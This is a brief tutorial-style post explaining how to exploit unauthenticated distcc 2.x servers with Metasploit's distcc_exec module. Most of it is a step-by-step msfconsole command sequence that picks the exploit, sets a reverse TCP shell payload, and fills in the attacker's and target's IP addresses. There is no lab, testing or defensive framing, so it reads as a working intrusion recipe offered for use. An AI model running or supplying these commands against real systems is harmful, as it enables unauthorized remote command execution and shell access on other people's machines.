This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3
Commands :
msfconsole
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit
VIDEO